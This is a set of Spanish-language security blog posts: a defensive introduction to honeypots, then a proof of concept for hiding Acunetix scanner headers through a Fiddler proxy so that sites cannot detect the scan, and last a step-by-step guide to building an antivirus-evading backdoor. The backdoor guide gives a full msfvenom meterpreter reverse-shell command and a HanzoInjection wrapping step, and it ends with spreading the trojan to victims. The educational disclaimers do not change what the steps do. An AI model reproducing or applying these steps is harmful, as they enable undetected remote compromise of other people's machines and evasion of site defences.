Introducción a los sistemas señuelo - Honeypots

Autor: Diego Jurado

Buenos días hackers!

En el día de hoy os traemos un tema muy interesante y que está muy de moda y no es otro que el de los sistemas señuelos, conocidos comúnmente como honeypots. Trataremos de dar una introducción clara y concisa para más adelante poder exponer un análisis más exhaustivo.


¿Que es un Honeypot?

Un honeypot (en inglés "tarro de miel") es un sistema muy flexible dentro de la seguridad informática, que se encarga de atraer y analizar el comportamiento de los atacantes en internet, y que provee al informático forense de una información extremadamente valiosa.

Y os preguntareis, ¿para que puede querer una persona atraer atacantes a sus propio sistema? , esto puede resultar muy contradictorio, pero lo que se busca con esta implementación es capturar todo el tráfico de red entrante y conocer todos los detalles acerca de las tendencias y metodologías de ataque de los atacantes así como los fallos de seguridad en nuestra red con el fin de subsanarlos.

Los honeypots pueden ejecutarse bajo cualquier sistema operativo y bajo cualquier servicio. Los servicios configurados determinan los vectores de ataque disponibles para que el intruso comprometa y ponga a prueba el sistema.



Finalidad de los Honeypots

Estas son algunas de las posibilidades que nos ofrecen los honeypots:

• Desviar y distraer la atención del atacante.
• Detectar y aprender nuevas vulnerabilidades.
• Obtener información sobre el atacante (geolocalización, ip,puertos,etc).
• Obtener tendencias de ataque y paises más atacados.
• Detectar nuevas muestras de malware que aún no se conozcan.
• Recopilar y estudiar tendencias de ataque

Clasificación de Honeypots

Los honeypots se clasifican según su implementación (virtuales o físicas) y su nivel de interacción (baja, media, alta).


SEGÚN SU IMPLEMENTACIÓN: 

• Para producción: Al implementar un honeypot en una red de producción, el objetivo principal es la obtención de información sobre técnicas empleadas para tratar de vulnerar los sistemas que componen dicha infraestructura.

• Para investigación: Por otro lado, en este caso los honeypots constituyen recursos educativos de naturaleza demostrativa cuyo fin es recopilar la mayor cantidad de información que permita al investigador poder analizar las nuevas tendencias y métodos de ataque así como los distintos objetivos atacados y orígenes de los ataques.

SEGÚN SU INTERACCIÓN: 

• Alta interacción: Este tipo de honeypots se trata de un sistema convencional,construidos con máquinas reales como el que podría utilizar cualquier usuario. Se sitúan generalmente en la red interna en producción y no tiene más utilidad que la de ser atacados, lo cual significaría que el sistema está mal configurado.
  
  Cada interacción con este honeypot se considera sospechosa por definición, y  todo el tráfico debe ser monitorizado y almacenado en una zona segura de la red a la que un potencial atacante no tenga acceso.

• Baja interacción: Este tipo suele ser creado y gestionado por organizaciones dedicadas a la investigación de acciones fraudulentas en la red, con la cual se investiga acerca de nuevas amenazas en la red. Son más fáciles de utilizar y mantener, con un riesgo prácticamente nulo.
  
  Esta implementación se basa por lo general en una instalación de software de emulación de sistema operativo, utilizando herramientas conocidas como VMware o Virtual Box.

Tipos de Honeypots

Estos son algunos de los honeypots más conocidos: 

• Kippo: Baja interacción, emula servicios de Secure Shell (SSH).

• Glastopf: Baja interacción para aplicaciones web.

• Dionaea; Baja interacción, sucesor de "Nepenthes" para la recogida de malware.

• Honeyd: Baja interacción , demonio que crea host virtuales en la red para servicios arbitrarios.

• Sebek: Alta interacción , funciona como HIDS (Host-Based Intrusion Detection System).

• Otros: KFSensor, Specter, HoneyBOT, HiHat

Espero que les haya gustado esta breve introducción, en la próxima entrega mostraremos en que partes de la red podemos montar estos sistemas señuelos y realizaremos una prueba de concepto (PoC) montando un honeypot de baja interacción en un sistema windows, linux o en una simple raspberry.

Para aprender más sobre el tema, os recomendamos la charla de Francisco Rodríguez (@0fjrm0), experto en ciberseguridad en INCIBE y creador de HoneyStation.

“conociendo como te atacan puedes defenderte mejor”   

Escaneando like a Sir

Prueba de concepto realizada por @ShargonXL (Twitter)

La POC de hoy es bastante sencillita, y trata de como pasar un Acunetix, en sitios que lo bloquean, o de forma que no se detecte (al menos de forma fácil)

Acunetix envia las siguientes cabeceras de forma automática, ya que ha de hacerse de manera profesional y avisando al cliente.

Versión 8.0 (con la que se realiza esta POC)

 

En la versión 9 envía unas mas como Acunetix-Product , creo recordar.

Según este post, envía también estas, no ha sido mi caso, pero lo suyo es que revisaras primero que cabeceras envía tu versión para poder continuar, y hacerlo a sabiendas, ya que pueden variar.

 Para protegerse, BlueTeam, tan sólo bastaría estas lineas de código php.

 

Estarías protegido de un ataque (escaneo ejem ejem) normal por acunetix. 

O no? Pues bien, vamos a ponerlo algo mas complicado al BlueTeam

Pues muy sencillo ahora vamos al Acunetix.

y le establecemos un proxy local al puerto que más rabia te de (y no esté en uso).

 

Abrimos el Fiddler (http://www.telerik.com/fiddler) (i love fiddler) y lo configuramos de forma que escuche peticiones a ese puerto.

 

 

Ahora todas las peticiones del Acunetix pasan por nuestro proxy. Le establecemos filtros de borrado de cabeceras.

 

Y ya puedes escanear, que ¡no será visto! (al menos no enviara dichas cabeceras) :)

 

Y eso es todo amigos!! 

P.D El autor no se hace responsable del mal uso que se le de a esta PoC, usen siempre estos conocimientos de forma ética y con consentimiento del cliente. 

Backdoor 100% indetectable con HanzoInjection

Autor: Diego Jurado

Buenas de nuevo hackers!


En el día de hoy, os traigo una nueva prueba de concepto muy interesante. Lo que haremos será generar un backdoor 100% indetectable para los antivirus, con la ayuda de HanzoInjection.
Para los que no saben que es un backdoor (puerta trasera), se puede definir como una secuencia de código que evita los sistemas de seguridad, permitiendo a un atacante acceder al sistema de forma remota. Las puertas traseras pueden ser utilizadas para fines maliciosos y de espionaje.
NOTA: Antes de comenzar, saber que vamos a utilizar una máquina en Kali-Linux y otra Windows.

PASO 1: 

Lo primero que haremos será crear un simple backdoor con la herramienta msfvenom. Como ya sabemos, este backdoor es detectable por algunos antivirus, por lo tanto no será completamente útil a la hora de realizar un ataque.
Con este comando, lo que haremos será utilizar:

• Payload meterpreter con conexión inversa.

• Lhost= 192.168.1.53 (IP del atacante).

• Lport=4444 (Puerto por el que establecemos la escucha).

• evil.bin = Fichero binario creado (en carpeta root/Escritorio).

Introducimos el siguiente comando en la consola:
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.53 lport=4444 -t raw -o /root/Escritorio/evil.bin

PASO 2:

En este punto, lo analizaremos con cualquier escaner online (excepto virustotal), en nuestro caso hemos utilizado: www.nodistribute.com , (otra buena opción es www.metascan-online.com ).

Podemos observar que el backdoor es detectado por 2/35 antivirus, no es mucho, pero queremos que sea 100% indetectable.

PASO 3:

Ya tenemos nuestro fichero binario (evil.bin) , lo llevaremos a una máquina WINDOWS. 

Ahora utilizaremos HanzoInjection (https://www.dropbox.com/s/yhtysslpo660nj0/hanzoInjection-master.zip?dl=0 ).

Únicamente debemos acceder a la carpeta donde se encuentra el ejecutable (teniendo el fichero evil.bin en la misma ruta) y ejecutar el siguiente comando:

> HanzoInjection.exe -p evil.bin -o evilInject.cs

Así creamos un archivo de código (.cs) que podrá ser convertido a (.exe).

PASO 4:

Lo siguiente que haremos será volver a Kali-Linux y crear un proyecto con monodevelop.

Esta herramienta nos permite transformar el código (.cs) en un archivo ejecutable (.exe).

Primero instalamos monodevelop:

> apt-get install monodevelop 

Creamos un proyecto nuevo con el nombre que queramos, en nuestro caso se ha llamado EvilProyect: 

Ahora deberemos compilar o construir el código, pero nos dará el siguiente error:

Para quitarlo accedemos a Proyecto -> Opciones de EvilProyect y seleccionamos la opción "Permitir código inseguro":

Un nuevo error relacionado con las librerias xml aparecerá. Para quitarlo iremos a Referencias -> Editar Referencias y añadiremos la libreria System.xml:

Compilamos el código correctamente y se habrá creado en la carpeta del proyecto nuestro ejecutable (EvilProyect.exe):

PASO 5:

Volvemos a escanear el archivo (EvilProyect.exe) y vemos ha quedado completamente limpio (100% Indetectable!!):

PASO 6:
Por último, utilizando la herramienta metasploit en Kali-Linux  y establecemos una conexión a la escucha utilizando el exploit multi/handler y el payload windows/meterpreter/reverse_tcp porsupuesto utilizando el mismo puerto/ip que usamos para la creación del backdoor.

En este punto, solo quedará propagar nuestro troyano y esperar a que la víctima lo ejecute. Automáticamente conseguiremos una sesión de meterpreter (shell) como vimos en anteriores post.
 


Espero que les haya gustado el post, y como decimos siempre, la prueba de concepto se ha realizado sobre máquinas virtualizadas y para fines educativos, no nos hacemos responsables de su mal uso.


"Es extraña la ligereza con la que los malvados creen que todo les saldrá bien" - Victor Hugo